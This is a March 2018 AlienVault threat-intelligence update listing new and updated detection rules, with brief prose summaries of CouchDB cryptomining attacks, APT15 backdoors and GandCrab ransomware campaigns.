Threat Intelligence and Cyber Threat Management (CTM) Protection Update for the 2nd week of March 2018

New Detection Technique – Apache CouchDB RCE (CVE-2017-12636)

AlienVault has observed significant targeting of Apache CouchDB servers recently, exploiting two known vulnerabilities: CVE-2017-12635 and CVE-2017-12636. These attacks deliver Monero cryptocurrency miners. The vulnerabilities were patched back in November 2017, so keeping the software up to date should be sufficient to prevent these attacks from succeeding.

The vulnerability is used to access CouchDB as the administrator. During the attack, a file (logo6.jpg) is downloaded, which is then executed as a shell script. The script kills any competing mining activities that are already running on the machine, and downloads the actual cryptomining executable together with a configuration file. Finally, it configures cron jobs to ensure persistence after the system reboots.

CouchDb is a popular DB management system, so attackers still have a wide range of possible targets.

We've added IDS signatures and the following correlation rule to detect this activity:

  • Exploitation & Installation, Client Side Exploit - Known Vulnerability, Apache CouchDB JSON Remote Privesc Attempt (CVE-2017-12636)

New Detection Technique – APT15 BS2005 RoyalAPT/DNS/CLI

APT15 is a group of targeted attackers that have been known for a number of years. Recent reporting has identified new backdoors such as RoyalAPT, RoyalDNS and RoyalCLI. Using this malware, they recently penetrated a government contractor and stole information about military technology.

RoyalCLI and RoyalAPT appear to be an evolution of APT15's earlier BS2005 malware. Also, they share some C&C domain names. Some evidence of compromise was found in the disk drives of the affected machines, where the C&C left traces of its activity. During the attack, they also used Mimikatz to dump some Windows credentials and generate Kerberos golden tickets to ensure persistence, leaving traces of this activity behind as well.

APT15 also deployed a DNS-based backdoor called RoyalDNS. This maintains persistence through a service called 'Nwsapagent.' C&C is performed using the TXT record of the DNS protocol.

After compromising initial machines, lateral movements were conducted via a combination of network commands and Windows RCE tools applied inside the LAN. 

We've added IDS signatures and the following correlation rule to detect this activity:

  • System Compromised, Trojan infection, APT15 BS2005 RoyalAPT/DNS/CLI

New Detection Techniques – Trojan Infection

We've updated the following correlation rules as a result of additional recent malicious activity:

  • System Compromised, Trojan infection, Arkei Stealer
  • System Compromised, Trojan infection, Grobios
  • System Compromised, Trojan infection, MSIL/Safen
  • System Compromised, Trojan infection, Win32/Configer
  • System Compromised, Trojan infection, Win32/QQWare.AA

New Detection Techniques

We've added the following correlation rules as a result of additional recent malicious activity:

  • Exploitation & Installation, Client Side Exploit - Known Vulnerability, Adobe Flash Type Confusion (CVE-2017-4920)
  • Exploitation & Installation, Client Side Exploit - Known Vulnerability, Adobe Flash Use After Free (CVE-2017-4919)
  • Exploitation & Installation, Client Side Exploit - Known Vulnerability, Exim 4.90.1 Base64 Overflow RCE (CVE-2018-6789)
  • Exploitation & Installation, Client Side Exploit - Known Vulnerability, GreenFlash SunDown EK Payload March 9 2018
  • Exploitation & Installation, Client Side Exploit - Known Vulnerability, MikroTik RouterOS Chimay Red RCE
  • System Compromise, C&C Communication, [PTsecurity] Fake SSL Certificate
  • System Compromise, C&C Communication, Zyklon HTTP Malicious SSL Certificate
  • System Compromise, Malicious Download, Suspicious infection.exe Download
  • System Compromise, Malware RAT, JanHof RAT
  • System Compromise, Malware RAT, QwertyRAT
  • System Compromise, Ransomware infection, MSIL/GhostFlower
  • System Compromise, Ransomware infection, Win32/CrystalCrypt

Updated Detection Technique – GandCrab

GandCrab ransomware appeared in the wild in January 2018. Since then, it's been distributed in several campaigns, including fake Chrome HoeflerText popup windows, spam mails, and the Rig exploit kit. The attack vector is initiated with a PDF linking a Word file download, which launches a PowerShell script that later downloads and executes a DLL file.

Campaigns evolved between January and March. Earlier infections deployed the Dridex banker trojan instead of the GandCrab ransomware. GandCrab first appeared  as a Windows executable with .exe extension. 

One of the most identifiable characteristics of GandCrab is that it asks for Dash cryptocurrency instead of Bitcoin for the ransom payment. It also uses NameCoin .BIT top-level domains for command and control activity.

We've added IDS signatures and the following correlation rule to detect this activity:

  • System Compromise, Ransomware infection, GandCrab

Updated Detection Technique – Malware SSL Certificates

We've added new IDS signatures to include the list of certificates identified by Abuse.ch to be associated with malware or botnet activities. The updated correlation rules use this information to detect command and control (C&C) communications related to several malware families, including:

  • System Compromise, C&C Communication, Bancos Variant Downloader SSL Certificate
  • System Compromise, C&C Communication, Known malicious SSL certificate
  • System Compromise, C&C Communication, StrongPity SSL activity
  • System Compromise, C&C Communication, Zeus Panda SSL Certificate

Updated Correlation Rules

We've updated the following correlation rules as a result of recent malicious activity:

  • Delivery & Attack, Malicious website, Phishing activity
  • System Compromise, Malware infection, CoinMiner
  • System Compromise, Malware RAT, QRat
  • System Compromise, Malware RAT, Remcos/Remvio
  • System Compromise, Mobile trojan infection, Android/Arukas.A!tr
  • System Compromise, Mobile trojan infection, Asacub.a Banker
  • System Compromise, Targeted Malware, StrongPity
  • System Compromise, Trojan infection, Bitcoin Miner
  • System Compromise, Trojan infection, Bancos Variant.DZO